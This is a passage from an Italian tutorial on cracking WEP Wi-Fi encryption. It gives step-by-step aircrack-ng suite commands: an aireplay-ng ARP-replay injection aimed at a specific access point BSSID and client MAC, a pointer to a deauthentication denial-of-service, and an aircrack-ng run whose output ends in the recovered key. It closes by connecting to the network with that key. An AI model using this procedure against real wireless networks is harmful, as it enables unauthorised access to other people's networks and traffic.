Anziché attendere quindi un tempo davvero lungo, possiamo provare ad aumentare il traffico di rete con reiterate richieste ARP (standard Ethernet): apriamo un altro terminale in parallelo (sempre con privilegi di root) e lanciamo un attacco di tipo ARP reply: sniffiamo un pacchetto di tipo ARP-request (il programma lo riconoscerà dalla sua "forma" caratteristica) diretto all'AP e lo rispediamo in ciclo, dato che il protocollo WEP nemmeno se ne accorge.
La forma sarà:
aireplay-ng --arpreplay -b <AP BSSID> -h <indirizzo MAC del client> <interfaccia di rete>
cioè nel caso in esame:
aireplay-ng --arpreplay -b 00:1A:11:88:7B:EC -h 00:2F:03:A3:6F:3C rausb0
Nel giro di pochi minuti il programma capterà un pacchetto di ARP request e lo userà come detto.
Se non si ha nemmeno la pazienza di aspettare qualche minuto, aprire una terza shell, sempre in qualità di root, ed operare secondo quanto scritto nella sezione Esempio di D.o.S. del client: attacco di de-autenticazione.
In ogni modo si operi, appena catturato un pacchetto di tale tipo il programma ci avvertirà prontamente:
Waiting for beacon frame (BSSID: 00:1A:11:88:7B:EC) on channel 11 Saving ARP requests in replay_arp-0411-223158.cap You should also start airodump-ng to capture replies. Read 2328 packets (got 1418 ARP requests and 0 ACKs), sent 3305 packets...(251 pps)
Ora i pacchetti (e gli IV) catturati aumenteranno molto (ma molto) più velocemente che prima.
Una volta ottenuto un sufficiente numero di pacchetti, tentiamo il crack tramite (su altra shell in parallelo):
aircrack-ng -z -b 00:1A:11:88:7B:EC /tmp/dumpfile*.cap
Aircrack-ng 1.0 beta2
[00:00:14] Tested 14 keys (got 29209 IVs)
KB depth byte(vote)
0 1/3 A8(36864) 06(35072) 6B(35072) 9C(35072) BF(35072) A6(34560) 1B(34304) A3(34304) BC(34304)
1 0/1 67(39424) 02(35840) 1F(35840) D9(35328) E2(35328) D1(35072) 53(34816) D8(34816) 96(34304)
2 0/1 E7(45056) D9(37888) 91(36864) 0E(36096) 3D(36096) E6(35584) 28(35328) 74(35328) 60(35072)
3 0/6 AC(37376) 60(37120) AD(35840) D1(35584) E2(35584) 49(35072) 1E(34560) 29(34560) 63(34560)
4 0/1 03(41728) 1A(36864) 58(35840) 09(35072) 73(35072) AE(35072) 97(34816) 19(34560) 2D(34560)
KEY FOUND!
Decrypted correctly: 100%
Con un po' di fortuna otterremo la chiave segreta (il messaggio Key found indica che la chiave è stata trovata), con la quale potremo poi connetterci all'access point, tramite la scheda di rete wireless primaria (in caso il PC ne fosse provvisto) o con la medesima scheda usata per il cracking, riportata in "normal" mode.